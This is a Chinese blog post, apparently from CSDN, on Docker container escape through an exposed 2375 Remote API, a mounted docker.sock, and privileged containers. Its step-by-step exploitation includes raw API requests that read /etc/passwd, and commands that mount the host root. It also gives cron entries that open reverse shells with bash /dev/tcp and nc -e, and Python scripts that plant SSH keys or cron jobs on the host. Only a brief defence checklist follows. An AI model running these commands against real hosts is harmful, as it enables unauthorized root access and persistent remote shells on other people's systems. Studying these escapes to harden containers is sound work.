sock 文件方式控制宿主机_初识docker逃逸(下)

最新推荐文章于 2023-07-16 16:50:10 发布
最新推荐文章于 2023-07-16 16:50:10 发布
阅读量263 收藏
点赞数
文章标签: sock 文件方式控制宿主机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39965490/article/details/111848407
版权
本文介绍了通过未授权访问Docker Swarm的2375端口、挂载docker.sock到容器内部以及特权模式运行容器等三种方式实现Docker逃逸的详细步骤。同时,讲解了如何利用这些漏洞执行系统命令,甚至获取宿主机的完全控制权。最后,提出了针对这些攻击方式的防御措施,包括更新Docker版本、避免以特权模式运行容器等。
摘要由CSDN通过智能技术生成

1、emote api 未授权访问

docker swarm是管理docker集群的工具。主从管理、默认通过2375端口通信。绑定了一个Docker Remote API的服务,可以通过HTTP、Python、调用API来操作Docker。 当使用官方推荐启动方式时dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375

在没有其他网络访问限制的主机上使用,则会在公网暴漏端口。

漏洞利用:

1、首先列出所有容器,得到id字段http://x.x.x.x:2375/containers/json

2、然后创建一个 execPOST /containers//exec HTTP/1.1Host: :PORTContent-Type: application/jsonContent-Length: 188{  "AttachStdin": true,  "AttachStdout": true,  "AttachStderr": true,  "Cmd": ["cat", "/etc/passwd"],  "DetachKeys": "ctrl-p,ctrl-q",  "Privileged": true,  "Tty": true}

使用burp模拟post请求发包,得到返回的id参数。

3、启动exec,成功执行了系统命令,读取到了passwd文件。POST /exec//start HTTP/1.1Host: :PORTContent-Type: application/json{ "Detach": false, "Tty": false}

成功获取到docker主机的命令执行权限,但是还无法逃逸到宿主机。

尝试通过写计划任务或者写ssh密钥得到宿主机权限

1、在容器内安装Docker作为client(可能需要换国内源)apt-get install docker.io

2、查看宿主机docker镜像信息docker -H tcp://x.x.x.x:2375 images

3、启动一个容器并将宿主机根目录挂在到容器的nuoyan目录docker -H tcp://x.x.x.x:2375 run -it -v /:/nuoyan adafef2e596e /bin/bash

4、写计划任务反弹shellecho '* * * * * bash -i >& /dev/tcp/x.x.x.x/8877 0>&1' >> /nuoyan/var/spool/cron/root

5、成功获取到宿主机shell,逃逸成功。

还可以使用师傅们写好的python脚本

写ssh密钥# coding:utf-8

import docker

import socks

import socket

import sys

import re

#开启代理

socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 1081)

#socks.set_default_proxy(socks.SOCKS5, '127.0.0.1', 1081)

socket.socket = socks.socksocket

ip = '172.16.145.165'

cli = docker.DockerClient(base_url='tcp://'+ip+':2375', version='auto')

#端口不一定为2375,指定version参数是因为本机和远程主机的API版本可能不同,指定为auto可以自己判断版本

image = cli.images.list()[0]

#读取生成的公钥

f = open('id_rsa_2048.pub', 'r')

sshKey = f.read()

f.close()

try:

cli.containers.run(

image=image.tags[0],

command='sh -c "echo '+sshKey+' >> /usr/games/authorized_keys"',

#这里卡了很久,这是正确有效的写法,在有重定向时直接写命令是无法正确执行的,记得加上sh -c

volumes={'/root/.ssh':{'bind': '/usr/games', 'mode': 'rw'}}, #找一个基本所有环境都有的目录

name='test' #给容器命名,便于后面删除

)

except docker.errors.ContainerError as e:

print(e)

#删除容器

try:

container = cli.containers.get('test')

container.remove()

except Expection as e:

continue

写计划任务(by P牛)import docker

client = docker.DockerClient(base_url='http://your-ip:2375/')

data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

2、docker.sock挂载到容器内部

Docker采用C/S架构,我们平常使用的Docker命令中,docker即为client,Server端的角色由docker daemon扮演,二者之间通信方式有以下3种:1、unix:///var/run/docker.sock

2、tcp://host:port

3、fd://socketfd

其中使用docker.sock进行通信为默认方式,当容器中进程需在生产过程中与Docker守护进程通信时,容器本身需要挂载/var/run/docker.sock文件。 本质上而言,能够访问docker socket 或连接HTTPS API的进程可以执行Docker服务能够运行的任意命令,以root权限运行的Docker服务通常可以访问整个主机系统。 因此,当容器访问docker socket时,我们可通过与docker daemon的通信对其进行恶意操纵完成逃逸。若容器A可以访问docker socket,我们便可在其内部安装client(docker),通过docker.sock与宿主机的server(docker daemon)进行交互,运行并切换至不安全的容器B,最终在容器B中控制宿主机。

利用过程:

1、首先运行一个挂载/var/run/的容器docker run -it -v /var/run/:/host/var/run/ adafef2e596e /bin/bash

2、寻找下挂载的sock文件find / -name docker.sock

3、在容器内安装Docker作为client(可能需要换国内源)apt-get install docker.io

4、查看宿主机docker信息docker -H unix:///host/var/run/docker.sock info

5、运行一个新容器并挂载宿主机根路径docker -H unix:///host/var/run/docker.sock run -v /:/aa -it ubuntu:14.04 /bin/bash

6、在新容器/nuoyan路径下完成对宿主机资源的访问

7、写入计划任务文件,反弹shellecho '* * * * * bash -i >& /dev/tcp/x.x.x.x/9988 0>&1' >> /nuoyan/var/spool/cron/root

成功接收到宿主机反弹的shell

3、特权模式

特权模式于版本0.6时被引入Docker,允许容器内的root拥有外部物理机root权限,而此前容器内root用户仅拥有外部物理机普通用户权限。 使用特权模式启动容器,可以获取大量设备文件访问权限。因为当管理员执行docker run —privileged时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。 当控制使用特权模式启动的容器时,docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令。

利用过程:

1、首先以特权模式运行一个docker容器docker run -it --privileged d27b9ffc5667 /bin/bash

2、查看磁盘文件fdisk -l

3、vda1存在于/dev目录下

4、新建一个目录,将/dev/vda1挂载至新建的目录mkdir /nuoyanmount /dev/vda1 /nuoyan

5、写入计划任务到宿主机echo '* * * * * bash -i >& /dev/tcp/x.x.x.x/2100 0>&1' >> /nuoyan/var/spool/cron/root

6、开启nc监听,成功接收到宿主机反弹的shell

防御docker逃逸1、更新Docker版本到19.03.1及更高版本——CVE-2019-14271、覆盖CVE-2019-5736

2、runc版本 > 1.0-rc6

3、k8s 集群版本>1.12

4、Linux内核版本>=2.6.22——CVE-2016-5195(脏牛)

5、Linux内核版本>=4.14——CVE-2017–1000405(大脏牛),未找到docker逃逸利用过程,但存在逃逸风险

6、不建议以root权限运行Docker服务

7、不建议以privileged(特权模式)启动Docker

8、不建议将宿主机目录挂载至容器目录

9、不建议将容器—cap-add=SYSADMIN启动,SYSADMIN意为container进程允许执行mount、umount等一系列系统管理操作,存在容器逃逸风险

weixin_39965490
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
GitLab CI/CD如何在docker in docker 模式下将流水线的产物存储到宿主机上?
知无涯
09-09 3678
最近 总是有同学向我咨询一个问题,如何将流水线过程中的一些文件存放到宿主机本地,当我们的Runner使用的是Docker时再运行流水线时是在一个容器里运行的,一旦作业运行完毕,容器销毁,就什么都不剩下了,但如果我们想要保存支持,可以使用关键词,使用它可以将文件上传到极狐GitLab上。但如何我们想要将容器中文件存放到宿主机本地该怎么办那?在此处是无法使用 等从容器中拷贝文件宿主机的指令的。本篇文章我就来给大家说一下如何将容器中的文件存放到宿主机本地。在探讨问题之前,我们先来说一下为什么会有 docker
Docker容器逃逸总结
SHELLCODE_8BIT的博客
03-12 2179
3.1 特权容器,特权容器下,所有capabiltiy都拥有,并且对设备/dev可见。1.1 条件竞争类dirtypipe + dac_search,dirtycow。以下几个如果被挂载,都会被可写,造成逃逸。1.2 内核漏洞,uaf等等。
Linux无法连接docker进程,关于linux:无法通过unix:/var/run/docker.sock连接到Docker守护程序。 泊坞窗守护程序正在运行吗?...
weixin_28953369的博客
04-28 2678
我已经应用了互联网上所有可用的解决方案,但仍然无法运行Docker。我想在服务器上使用Scrapy Splash。这是我运行的命令的history。docker run -p 8050:8050 scrapinghub/splashsudo docker run -p 8050:8050 scrapinghub/splashsudo usermod -aG docker $(whoami)sudo...
关于Docker逃逸
Aiwin的博客
03-22 2326
Docker逃逸复现
sock 文件方式控制宿主机_sock
weixin_29164081的博客
01-13 256
使用select实现I/O复用2021-01-12 23:57:39实验条件:在使用一个服务器,多个客户端的情况下,实现回声效果,即客户端传什么内容给服务器,服务器将该内容返回。具体实现:每个客户端将自己的进程号传到服务器端,服务器端将该内容传给客户端。运行方法:server.cpp#include #include #include 发送结构化的网络消息数据2021-01-12 20:32:04...
无法找到docker.sock
最新发布
leechm的博客
07-16 2790
因为如果直接使用dockerd命令的话,docker命令正常,因此我们直接把socket的路径写到service文件中即可。原因是:没有生成/var/run/docker.sock。然后无法使用docker
docker误删docker.sock解决办法
Q_QA_A的博客
03-13 2391
没事别动docker.sock文件,如果删了,将同目录下的docker.pid也删了,再重启服务就好了~
sock 文件方式控制宿主机_在docker容器中调用和执行宿主机docker操作
weixin_32506743的博客
12-31 915
首先这个帖子,献给docker新手。当然如果你是一个老手,文中分割线后的操作方法也是一种思路。首先说一下,如何在docker中执行宿主机docker操作,我们管它叫docker in docker。至于为什么要在docker中操作宿主机docker,优点不言而喻,你既可以将你的具体需求容器化部署,又不用直接在宿主机上安装(假设我们没有办法在docker中操作宿主机docker,那么我们只能将...
docker容器中调用和执行宿主机docker操作
01-20
描述中提到,通过将宿主机的`docker.sock`文件和`docker`二进制文件挂载到容器中,可以在容器内部执行如`docker images`等Docker命令。`docker.sock`是Docker守护进程的Unix套接字,它提供了与Docker守护进程通信的...
java 获取docker ip_docker容器内部获取宿主机ip地址方法以及报错解决
weixin_42298424的博客
02-27 7346
1,在docker容器内执行以下python代码或根据需要插入到你的.py文件中:import paramiko #通过pip3 install paramiko 安装s = paramiko.SSHClient()s.load_system_host_keys()s.set_missing_host_key_policy(paramiko.AutoAddPolicy())s.connect(ho...
宿主机 远程访问docker运行的容器,如何配置
kai402458953的博客
08-25 2330
1.CentOS7默认的防火墙不是iptables,而是firewalle 安装iptable iptable-service #先检查是否安装了iptables service iptables status #安装iptables yum install -y iptables #升级iptables yum update iptables #安装iptables-services yum...
centOS8.3安装docker,第一次运行正常,第二次就无法运行了,提示缺少sock
weixin_46464010的博客
07-25 482
具体什么报错信息我不记得了,反正网上查了好久都没解决办法。 具体是怎么解决的我也有点不记得了,估计应该是跟我操作docker服务的时候用了service命令有关吧。 大家可以尝试一下: 启动docker服务的时候尽量用systemctl start docker,不要用service docker start; 关闭docker的时候尽量用systemctl stop docker,不要用service docker stop。 重启和查看服务状态也同理。 事实上centOS8.3好像也建议用systemc
(二)docker的部署安装,配置,基础命令
weixin_30677073的博客
05-24 91
一、docker 的安装部署 这里不过多介绍,下面这两个linux发型版 安装可以参考 ubuntu的 docker-ce安装 centos7的 docker-ce安装 二.docker配置文件 重要参数解释: OPTIONS 用来控制Docker Daemon进程参数 -H 表示Docker Daemon绑定的地址, -H=unix:///var/run/docker.so...
CentOS上开启Docker远程访问
weixin_42023748的博客
02-17 1137
CentOS上开启Docker远程访问 1.修改/usr/lib/systemd/system/docker.service 直接在ExecStart后面追加***-H unix:///var/run/docker.sock -H 0.0.0.0:2376*** 2.重启docker,让配置生效 # systemctl daemon-reload # systemctl restart docker.service 3.用netstat -lntp | grep 2375 查看配置是否
Docker 开启2375端口提供外部访问
沛哥儿的专栏
01-12 1948
1、编辑docker.service # vim /usr/lib/systemd/system/docker.service 在 ExecStart=/usr/bin/dockerd-current 后 增加 -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock [Unit] Description=Docker Application Container Engine Documentation=https://docs.docker.c..
docker 逃逸 简介
whatday的专栏
07-23 2028
目录 前言 Docker逃逸原因 docker环境判断 实验环境 环境搭建 内核漏洞 Dirty COW漏洞逃逸 容器服务缺陷 CVE-2019-5736漏洞逃逸 配置不当引发的docker逃逸 1、emote api 未授权访问 2、docker.sock挂载到容器内部 3、特权模式 防御docker逃逸 参考文章 前言 前不久看到几篇实战文章用到了docker逃逸技术,自己之前没接触过,整理复现下常用的Docker逃逸方法,可能存在认知错误的地方,希望各位大佬指出,感激
jenkins把docker相关的命令和依赖使用-v挂载到容器
Vv的博客
10-23 2898
docker run  -d   -u root  -v /usr/bin/docker:/usr/bin/docker -v /var/run/docker.sock:/var/run/docker.sock -v /usr/lib64/libltdl.so.7:/usr/lib/x86_64-linux-gnu/libltdl.so.7 jenkins 官网jenkins镜像(ubuntu系...
执行docker命令时异常: at unix:///var/run/docker.sock. Is the docker daemon running
积跬步,至千里。
06-17 5024
执行docker命令时异常: Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running
docker容器内调用宿主机docker执行
03-14
您可以使用宿主机Docker API 来在 Docker 容器内调用宿主机 Docker。具体来说,您可以使用 Docker SDK for Python ...同时,它会将宿主机Docker socket 文件挂载到容器内,以便容器可以访问宿主机Docker API。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值